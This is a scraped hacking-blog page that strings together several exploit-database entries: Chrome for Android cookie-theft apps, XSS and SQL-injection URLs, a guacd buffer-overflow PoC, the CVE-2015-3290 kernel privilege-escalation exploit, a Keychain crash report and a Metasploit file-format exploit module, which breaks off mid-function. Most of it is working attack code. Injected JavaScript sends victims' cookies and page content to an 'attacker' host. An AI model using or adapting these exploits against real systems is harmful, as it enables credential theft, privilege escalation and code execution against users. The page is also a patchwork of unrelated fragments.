source: https://www.securityfocus.com/bid/55523/info
Google Chrome for Android is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
Versions prior to Chrome for Android 18.0.1025308 are vulnerable.
<body>
<u>Wait a few seconds.</u>
<script>
function doitjs() {
var xhr = new XMLHttpRequest;
xhr.onload = function() {
alert(xhr.responseText);
};
xhr.open('GET', document.URL);
xhr.send(null);
}
setTimeout(doitjs, 8000);
</script>
</body>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293587
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/55523/info
Google Chrome for Android is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
Versions prior to Chrome for Android 18.0.1025308 are vulnerable.
package jp.mbsd.terada.attackchrome1;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
import android.content.Intent;
import android.net.Uri;
public class Main extends Activity {
// TAG for logging.
public final static String TAG = "attackchrome1";
// Cookie file path of Chrome.
public final static String CHROME_COOKIE_FILE_PATH =
"/data/data/com.android.chrome/app_chrome/Default/Cookies";
// Temporaly directory in which the symlink will be created.
public final static String MY_TMP_DIR =
"/data/data/jp.mbsd.terada.attackchrome1/tmp/";
// The path of the Symlink (must have "html" extension)
public final static String LINK_PATH = MY_TMP_DIR + "cookie.html";
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}
// Method to invoke Chrome.
public void invokeChrome(String url) {
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse(url));
startActivity(intent);
}
// Method to execute OS command.
public void cmdexec(String[] cmd) {
try {
Runtime.getRuntime().exec(cmd);
}
catch (Exception e) {
Log.e(TAG, e.getMessage());
}
}
// Main method.
public void doit() {
try {
// Create the symlink in this app's temporary directory.
// The symlink points to Chrome's Cookie file.
cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR});
cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH});
cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR});
Thread.sleep(1000);
// Force Chrome to load attacker's web page to poison Chrome's Cookie file.
// Suppose the web page sets a Cookie as below.
// x=<img><script>document.images[0].src='http://attacker/?'
// +encodeURIComponent(document.body.innerHTML)</script>;
// expires=Tue, 01-Jan-2030 00:00:00 GMT
String url1 = "http://attacker/set_malicious_cookie.php";
invokeChrome(url1);
Thread.sleep(10000);
// Force Chrome to load the symlink.
// Chrome renders the content of the Cookie file as HTML.
String url2 = "file://" + LINK_PATH;
invokeChrome(url2);
}
catch (Exception e) {
Log.e(TAG, e.getMessage());
}
}
}
source: https://www.securityfocus.com/bid/55523/info
Google Chrome for Android is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
Versions prior to Chrome for Android 18.0.1025308 are vulnerable.
// This is a part of malicious Android app.
public void attack() {
try {
// let Chrome app load its Cookies file, so that Chrome app
// automatically save it to /sdcard/Download/ directory.
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));
startActivity(intent);
// wait a few seconds
Thread.sleep(3000);
// read the Cookie file (/sdcard/Download/Cookies.bin)
FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");
...
}
source: https://www.securityfocus.com/bid/55523/info
Google Chrome for Android is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
Versions prior to Chrome for Android 18.0.1025308 are vulnerable.
package jp.mbsd.terada.attackchrome1;
import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.net.Uri;
public class Main extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}
// get intent to invoke the chrome app
public Intent getIntentForChrome(String url) {
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse(url));
return intent;
}
public void doit() {
try {
// At first, force the chrome app to open a target Web page
Intent intent1 = getIntentForChrome("http://www.google.com/1");
startActivity(intent1);
// wait a few seconds
Thread.sleep(3000);
// JS code to inject into the target (www.google.com)
String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
+ "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
+ "document.body.appendChild(img);";
Intent intent2 = getIntentForChrome(jsURL);
// Trick to prevent Chrome from opening the JS URL in a different tab
intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
// Inject JS into the target Web page
startActivity(intent2);
}
catch (Exception e) {}
}
}
source: https://www.securityfocus.com/bid/55509/info
Atlassian Confluence is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Atlassian Confluence versions prior to 4.1.9 are vulnerable.
http://www.example.com/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm
source: https://www.securityfocus.com/bid/55504/info
FBDj is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/stats/playerdetails.php?id=5'
http://www.example.com/warstats/playerdetails.php?id=13'
http://www.example.com/playerdetails.php?id=9'
http://www.example.com/il2-stats/playerdetails.php?id=29'
source: https://www.securityfocus.com/bid/55500/info
Openfiler is prone to multiple cross-site scripting and information disclosure vulnerabilities.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Openfiler versions 2.3, 2.99.1 and 2.99.2 are vulnerable; other versions may also be affected.
https://www.example.com/admin/system.html?step=2&device="><script>alert(document.cookie);</script><p+"
https://www.example.com/admin/volumes_iscsi_targets.html?targetName="><script>alert(document.cookie);</script><p+"
https://www.example.com/phpinfo.html
https://www.example.com/uptime.html
source: https://www.securityfocus.com/bid/55497/info
libguac is prone to a remote buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
#!/usr/bin/python
# CVE-2012-4415: PoC for guacd buffer overflow vulnerability # # Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi> # # Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with # default configuration. Uses return-to-libc to bypass non-executable # stack.
#
import socket, struct
PROTOCOL_ADDRESS = 0xbf807e9f
SYSTEM_ADDRESS = 0xb76e7640
class GuacdPOC:
def __init__(self, command):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(('localhost', 4822))
self.s("select")
self.c(",")
protocol = (command + "; " + "#" * 265)[:265]
protocol += struct.pack("L", PROTOCOL_ADDRESS)
protocol += struct.pack("L", SYSTEM_ADDRESS)
self.s(protocol)
self.c(";")
def s(self, x):
self.sock.send("%d.%s" % (len(x), x))
def c(self, x):
self.sock.send(x)
GuacdPOC("touch /tmp/owned")
/*
> +++++ CVE-2015-3290 +++++
>
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed by:
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
>
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
>
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
> perf_event_open using seccomp. A fully-functional, portable, reliable
> exploit is privately available and will be published in a week or two.
> *Patch your systems*
And here's a real advisory:
If an NMI returns via espfix64 and is interrupted during espfix64 setup
by another NMI, the return state is corrupt. This is exploitable for
reliable privilege escalation on any Linux x86_64 system in which
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
nested.
Glossing over a lot of details, the basic structure of Linux' nested NMI
handling is:
nmi_handler:
if (in_nmi) {
nmi_latched = true;
return;
}
in_nmi = true;
handle the nmi;
atomically (this is magic):
if (nmi_latched) {
nmi_latched = false;
start over;
} else {
in_nmi = false;
return and unmask NMIs;
}
Alas, on x86_64, there is no reasonable way to block NMIs to run the
atomic part of that pseudocode atomically. Instead, the entire atomic
piece is implemented by the single instruction IRET.
But x86_64 is more broken than just that. The IRET instruction does not
restore register state correctly [1] when returning to a 16-bit stack
segment. x86_64 has a complicated workaround called espfix64. If
espfix64 is invoked on return, a well-behaved IRET is emulated by a
complicated scheme that involves manually switching stacks. During the
stack switch, there is a window of approximately 19 instructions between
the start of espfix64's access to the original stack and when espfix64
is done with the original stack. If a nested NMI occurs during this
window, then the atomic part of the basic nested NMI algorithm is
observably non-atomic.
Depending on exactly where in this window the nested NMI hits, the
results vary. Most nested NMIs will corrupt the return context and
crash the calling process. Some are harmless except that the nested NMI
gets ignored. There is a two-instruction window in which the return
context ends up with user-controlled RIP and CS set to __KERNEL_CS.
A careful exploit (attached) can recover from all the crashy failures
and can regenerate a valid *privileged* state if a nested NMI occurs
during the two-instruction window. This exploit appears to work
reasonably quickly across a fairly wide range of Linux versions.
If you have SMEP, this exploit is likely to panic the system. Writing
a usable exploit against a SMEP system would be considerably more
challenging, but it's surely possible.
Measures like UDEREF are unlikely to help, because this bug is outside
any region that can be protected using paging or segmentation tricks.
However, recent grsecurity kernels seem to forcibly disable espfix64, so
they're not vulnerable in the first place.
A couple of notes:
- This exploit's payload just prints the text "CPL0". The exploit
will keep going after printing CPL0 so you can enjoy seeing the
frequency with which it wins. Interested parties could easily
write different payloads. I doubt that any existing exploit
mitigation techniques would be useful against this type of
attack.
- If you are using a kernel older than v4.1, a 64-bit build of the
exploit will trigger a signal handling bug and crash. Defenders
should not rejoice, because the exploit works fine when build
as a 32-bit binary or (so I'm told) as an x32 binary.
- This is the first exploit I've ever written that contains genuine
hexadecimal code. The more assembly-minded among you can have
fun figuring out why :)
[1] By "correctly", I mean that the register state ends up different
from that which was saved in the stack frame, not that the
implementation doesn't match the spec in the microcode author's minds.
The spec is simply broken (differently on AMD and Intel hardware,
perhaps unsurprisingly.)
--Andy
*/
/*
* Copyright (c) 2015 Andrew Lutomirski.
* GPL v2
*
* Build with -O2. Don't use -fno-omit-frame-pointer.
*
* Thanks to Petr Matousek for pointing out a bug in the exploit.
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <inttypes.h>
#include <asm/ldt.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/processor-flags.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <err.h>
/* Abstractions for some 32-bit vs 64-bit differences. */
#ifdef __x86_64__
# define REG_IP REG_RIP
# define REG_SP REG_RSP
# define REG_AX REG_RAX
struct selectors {
unsigned short cs, gs, fs, ss;
};
static unsigned short *ssptr(ucontext_t *ctx)
{
struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
return &sels->ss;
}
static unsigned short *csptr(ucontext_t *ctx)
{
struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
return &sels->cs;
}
#else
# define REG_IP REG_EIP
# define REG_SP REG_ESP
# define REG_AX REG_EAX
# define REG_CR2 (REG_SS + 3)
static greg_t *ssptr(ucontext_t *ctx)
{
return &ctx->uc_mcontext.gregs[REG_SS];
}
static greg_t *csptr(ucontext_t *ctx)
{
return &ctx->uc_mcontext.gregs[REG_CS];
}
#endif
static char altstack_data[SIGSTKSZ];
static void sethandler(int sig, void (*handler)(int, siginfo_t *, void *),
int flags)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = handler;
sa.sa_flags = SA_SIGINFO | flags;
sigemptyset(&sa.sa_mask);
if (sigaction(sig, &sa, 0))
err(1, "sigaction");
}
static jmp_buf jmpbuf;
static volatile unsigned long expected_rsp;
static volatile unsigned int cpl0;
static void handler(int sig, siginfo_t *info, void *ctx_void)
{
ucontext_t *ctx = (ucontext_t*)ctx_void;
unsigned long sig_err = ctx->uc_mcontext.gregs[REG_ERR];
unsigned long sig_trapno = ctx->uc_mcontext.gregs[REG_TRAPNO];
char errdesc[64] = "";
if (sig_trapno == 14) {
strcpy(errdesc, " ");
if (sig_err & (1 << 0))
strcat(errdesc, "PRESENT ");
if (sig_err & (1 << 1))
strcat(errdesc, "WRITE ");
if (sig_err & (1 << 2))
strcat(errdesc, "USER ");
sprintf(errdesc + strlen(errdesc), "at 0x%llX",
(unsigned long long)ctx->uc_mcontext.gregs[REG_CR2]);
} else if (sig_err != 0) {
const char *src = (sig_err & 1) ? " EXT" : "";
const char *table;
if ((sig_err & 0x6) == 0x0)
table = "GDT";
else if ((sig_err & 0x6) == 0x4)
table = "LDT";
else if ((sig_err & 0x6) == 0x2)
table = "IDT";
else
table = "???";
sprintf(errdesc, " %s%s index %lu, ",
table, src, sig_err >> 3);
}
char trapname[32];
if (sig_trapno == 13)
strcpy(trapname, "GP");
else if (sig_trapno == 11)
strcpy(trapname, "NP");
else if (sig_trapno == 12)
strcpy(trapname, "SS");
else if (sig_trapno == 14)
strcpy(trapname, "PF");
else if (sig_trapno == 32)
strcpy(trapname, "IRET"); /* X86_TRAP_IRET */
else
sprintf(trapname, "%lu", sig_trapno);
printf("+ State was corrupted: %s #%s(0x%lx%s)\n",
(sig == SIGSEGV ? "SIGSEGV" : "SIGTRAP"),
trapname, (unsigned long)sig_err,
errdesc);
if (cpl0) {
printf(" CPL0\n");
cpl0 = 0;
}
if (!(ctx->uc_mcontext.gregs[REG_EFL] & X86_EFLAGS_IF))
printf(" RFLAGS = 0x%llX (interrupts disabled)\n",
(unsigned long long)ctx->uc_mcontext.gregs[REG_EFL]);
if (ctx->uc_mcontext.gregs[REG_SP] != expected_rsp)
printf(" RSP = 0x%016llX\n",
(unsigned long long)ctx->uc_mcontext.gregs[REG_SP]);
unsigned short normal_ss;
asm ("mov %%ss, %0" : "=rm" (normal_ss));
if (*ssptr(ctx) != 0x7 && *ssptr(ctx) != normal_ss)
printf(" SS = 0x%hX\n", *ssptr(ctx));
siglongjmp(jmpbuf, 1);
}
static void set_ldt(void)
{
/* Boring 16-bit data segment. */
const struct user_desc data_desc = {
.entry_number = 0,
.base_addr = 0,
.limit = 0xfffff,
.seg_32bit = 0,
.contents = 0, /* Data, expand-up */
.read_exec_only = 0,
.limit_in_pages = 0,
.seg_not_present = 0,
.useable = 0
};
if (syscall(SYS_modify_ldt, 1, &data_desc, sizeof(data_desc)) != 0)
err(1, "modify_ldt");
}
int main(int argc, char **argv)
{
static unsigned short orig_ss; /* avoid RSP references */
set_ldt();
sethandler(SIGSEGV, handler, SA_ONSTACK);
sethandler(SIGTRAP, handler, SA_ONSTACK);
stack_t stack = {
.ss_sp = altstack_data,
.ss_size = SIGSTKSZ,
};
if (sigaltstack(&stack, NULL) != 0)
err(1, "sigaltstack");
printf("If I produce no output, then either your kernel is okay\n"
"or you didn't abuse perf appropriately.\n"
"Run me under heavy perf load. For example:\n"
"perf record -g -o /dev/null -e cycles -e instructions -c 10000 %s\n", argv[0]);
if (sizeof(void *) != 4) {
printf("*** WARNING *** A 64-bit build of this exploit will not\n"
" work correctly on kernels before v4.1 due to\n"
" a signal handling bug. Build for 32-bit\n"
" or x32 instead\n");
}
sigsetjmp(jmpbuf, 1);
asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));
while (1) {
#ifdef __x86_64__
asm volatile (
/* A small puzzle for the curious reader. */
"mov $2048, %%rbp \n\t"
/* Save rsp for diagnostics */
"mov %%rsp, %[expected_rsp] \n\t"
/*
* Let 'er rip.
*/
"mov %[ss], %%ss \n\t" /* begin corruption */
"movl $1000, %%edx \n\t"
"1: decl %%edx \n\t"
"jnz 1b \n\t"
"mov %%ss, %%eax \n\t" /* grab SS to display */
/* Did we enter CPL0? */
"mov %%cs, %%dx \n\t"
"testw $3, %%dx \n\t"
"jnz 2f \n\t"
"incl cpl0(%%rip) \n\t"
"leaq 3f(%%rip), %%rcx \n\t"
"movl $0x200, %%r11d \n\t"
"sysretq \n\t"
"2: \n\t"
/*
* Stop further corruption. We need to check CPL
* first because we need RPL == CPL.
*/
"mov %[orig_ss], %%ss \n\t" /* end corruption */
"subq $128, %%rsp \n\t"
"pushfq \n\t"
"testl $(1<<9),(%%rsp) \n\t"
"addq $136, %%rsp \n\t"
"jz 3f \n\t"
"cmpl %[ss], %%eax \n\t"
"je 4f \n\t"
"3: int3 \n\t"
"4: \n\t"
: [expected_rsp] "=m" (expected_rsp)
: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
: "rax", "rcx", "rdx", "rbp", "r11", "flags"
);
#else
asm volatile (
/* A small puzzle for the curious reader. */
"mov %%ebp, %%esi \n\t"
"mov $2048, %%ebp \n\t"
/* Save rsp for diagnostics */
"mov %%esp, %[expected_rsp] \n\t"
/*
* Let 'er rip.
*/
"mov %[ss], %%ss \n\t" /* begin corruption */
"movl $1000, %%edx \n\t"
"1: .byte 0xff, 0xca \n\t" /* decl %edx */
"jnz 1b \n\t"
"mov %%ss, %%eax \n\t" /* grab SS to display */
/* Did we enter CPL0? */
"mov %%cs, %%dx \n\t"
"testw $3, %%dx \n\t"
"jnz 2f \n\t"
".code64 \n\t"
"incl cpl0(%%rip) \n\t"
"leaq 3f(%%rip), %%rcx \n\t"
"movl $0x200, %%r11d \n\t"
"sysretl \n\t"
".code32 \n\t"
"2: \n\t"
/*
* Stop further corruption. We need to check CPL
* first because we need RPL == CPL.
*/
"mov %[orig_ss], %%ss \n\t" /* end corruption */
"pushf \n\t"
"testl $(1<<9),(%%esp) \n\t"
"addl $4, %%esp \n\t"
"jz 3f \n\t"
"cmpl %[ss], %%eax \n\t"
"je 4f \n\t"
"3: int3 \n\t"
"4: mov %%esi, %%ebp \n\t"
: [expected_rsp] "=m" (expected_rsp)
: [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
: "eax", "ecx", "edx", "esi", "flags"
);
#endif
/*
* If we ended up with IF == 0, there's no easy way to fix
* it. Instead, make frequent syscalls to avoid hanging
* the system.
*/
syscall(0x3fffffff);
}
}
# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
# Date: 22/07/2015
# Exploit Author: Juan Sacco
# Vendor Homepage: https://www.apple.com
# Software Link: https://www.apple.com/en/downloads/
# Version: 9.0 (55161)
# Tested on: OSX Yosemite 10.10.4
# CVE : None
# History - Reported to product-security@apple.com 20 Jul 2015
# Be careful: Crashing the Keychain will affect the user ability to use
Keychain stored passwords.
# How to reproduce it manually
1. Select a certificate, right click "New certificate preference.."
2. Under "Location or Email address:" add random values +9000
3. Click on Add to conduct the PoC manually
# Technically:
Performing @selector(addCertificatePreference:) from sender NSButton
0x608000148cf0
# Exception type
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_PROTECTION_FAILURE at 0x00007fff4d866828
External Modification Warnings:
VM Regions Near 0x7fff4d866828:
MALLOC_SMALL 00007f9e7d000000-00007f9e80000000 [ 48.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4c7de000-00007fff4ffde000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff4ffde000-00007fff507de000 [ 8192K]
rw-/rwx SM=COW thread 0
(lldb)
Process 490 resuming
Process 490 stopped
* thread #1: tid = 0x19b7, 0x00007fff92c663c3
Security`SecCertificateSetPreference + 325, queue =
'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2,
address=0x7fff4d866828)
frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325
Security`SecCertificateSetPreference:
-> 0x7fff92c663c3 <+325>: callq 0x7fff92cf18b2 ; symbol stub
for: CFStringGetCString
0x7fff92c663c8 <+330>: movq %rbx, -0x670(%rbp)
0x7fff92c663cf <+337>: testb %al, %al
0x7fff92c663d1 <+339>: jne 0x7fff92c663d8 ; <+346>
Process: Keychain Access [598]
Path: /Applications/Utilities/Keychain
Access.app/Contents/MacOS/Keychain Access
Identifier: com.apple.keychainaccess
Version: 9.0 (55161)
Build Info: KeychainAccess-55161000000000000~620
Code Type: X86-64 (Native)
Parent Process: ??? [1]
Responsible: Keychain Access [598]
User ID: 501
Date/Time: 2015-07-28 13:32:05.183 +0200
OS Version: Mac OS X 10.10.4 (14E46)
Report Version: 11
Anonymous UUID: 08523B58-1EF8-DC4A-A7D7-CB31074E4395
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
VM Regions Near 0x7fff507776c8:
MALLOC_SMALL 00007ff93c800000-00007ff93e000000 [ 24.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4e5d7000-00007fff51dd7000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff51dd7000-00007fff525d7000 [ 8192K]
rw-/rwx SM=COW thread 0
rax: 0x0000000001e5e1a0 rbx: 0x0000000000000006 rcx: 0x0000000008000100
rdx: 0x0000000001e5e1a0
rdi: 0x000060000045b6c0 rsi: 0x00007fff507776d0 rbp: 0x00007fff525d5f30
rsp: 0x00007fff507776d0
r8: 0x0000000000000000 r9: 0x00007fff79e6a300 r10: 0x00007ff93c019790
r11: 0x00007fff79147658
r12: 0x000000000000002d r13: 0x00007fff507776d0 r14: 0x00007fff525d5880
r15: 0x00007ff93ae41680
rip: 0x00007fff901083c3 rfl: 0x0000000000010202 cr2: 0x00007fff507776c8
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'zlib'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
'Description' => %q{
This module embeds an exploit into an ucompressed map file (.h3m) for
Heroes of Might and Magic III. Once the map is started in-game, a
buffer overflow occuring when loading object sprite names leads to
shellcode execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pierre Lindblad', # Vulnerability discovery
'John AAkerblom' # Vulnerability discovery, PoC and Metasploit module
],
'References' =>
[
[ 'EDB', '37716' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Targets' =>
[
[
'H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
{
# Two "Anticrash"-gadgets are needed or the game will crash before ret
#
# Anticrash1, needs to pass the following code down to final JMP:
# MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
# XOR EBX, EBX
# CMP EAX, EBX
# JE SHORT <crash spot> ; JMP to crash if EAX is 0
# MOV CL, BYTE PTR DS : [EAX - 1]
# CMP CL, BL
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
# CMP CL, 0FF
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
# CMP EDI, EBX
# JNE <good spot> ; JMP to good spot. Always occurs if we get this far
#
# Summary: An address which when incremented by 4 and then dereferenced
# leads to for example a string which is preceeded neither by a 0x00 or 0xFF
'Anticrash1' => 0x004497D4,
# Anticrash2, needs to return out of the following call (tricky):
#
# MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
# CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
#
# Summary: An address which when dereferenced leads to an address that
# when incremented by 4 and then deferenced leads to a function returning
# without accessing any registers/memory that would cause a crash.
'Anticrash2' => 0x006A6430,
'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
{
'Anticrash1' => 0x00456A48,
'Anticrash2' => 0x006A6830,
'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
{
# The two anticrash gadgets are accessed in reverse order for this target,
# meaning that the documentation above for Anticrash1 applies to Anticrash2
# here. However, Anticrash1 here is accessed differently than the other targets.
# Anticrash1, needs to pass the following code:
# CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
# JNE 00591F37
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
'Anticrash2' => 0x005CE200,
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'CRC32' => 0xFEEFB9EB
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 29 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME',
[
false,
'If file exists, exploit will be embedded' \
' into it. If not, a new default h3m file where' \
' it will be embedded will be created.',
'sploit.h3m'
])
], self.class)
end
def exploit
buf = ''
# Load h3m into buffer from uncompressed .h3m on disk/default data
begin
buf << read_file(datastore['FILENAME'])
print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
rescue Errno::ENOENT
print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
'default .h3m data')
buf << make_default_h3m
end
# Find the object attributes array in the file by searching for a sprite name that occurs
# as the first game object in all maps.
objects_pos = buf.index('AVWmrnd0.def')
if objects_pos.nil?
print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
'. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
return
end
# Entries in the objects array start with a string size followed by game sprite name string
# Move back 4 bytes from the first sprite name to get to the start of the objects array
objects_pos -= 4
print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)
# Construct a malicious object entry with a big size, where the sprite name starts
# with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
# but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
# After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
# overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
# it returns to the CALL ESP-gadget are required for the game not to crash before returning.
size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
exp = ''
exp << [size].pack('V')
exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
exp << rand_text(target['Padding'])
exp << [target.ret].pack('V')
exp << [target['Anticrash1']].pack('V')
exp << [target['Anticrash2']].pack('V')
exp << payload.encoded
# Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
from = objects_pos
to = from + size
buf[from..to] = exp
print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)
# Demo version has a crc32 check to disallow other maps than the one it comes with.
if target['CRC32']
buf = forge_crc32(buf, target['CRC32'])
if Zlib.crc32(buf) == target['CRC32']
print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
else
print_error('Failed to forge CRC32')
return
end
end
# Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
file_create(buf)
end
def substring_pos(string, substring)
string.enum_for(:scan, substring).map { $~.offset(0)[0] }
end
#
# Loads a file
#
def read_file(fname)
buf = ''
::File.open(fname, 'rb') do |f|
buf << f.read
end
buf
end
#
# Returns data for a minimimum required S size h3m map containing 2 players
#
def make_default_h3m
buf = ''
# Set map specifications to 36x36 (0x24000000) map with 2 players, with
# default/no settings for name, description, victory condition etc
buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
buf << "\x00\x00\xff\xff\xff\x00"
buf << "\xFF" * 16
buf << "\x00" * 35
# Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
buf << "\x00" * (36 * 36 * 7)
# Set object attribute array count to 1
buf << "\x01\x00\x00\x00"
# Size of first sprite name, this will be overwritten
buf << "\x12\x34\x56\x78"
# Standard name for first object, which will be searched for
buf << 'AVWmrnd0.def'
buf
end
#
# Forge crc32 by adding 4 bytes at the end of data
# http://blog.stalkr.net/2011/03/crc-32-forging.html
#
def forge_crc32(data, wanted_crc)
crc32_reverse = [
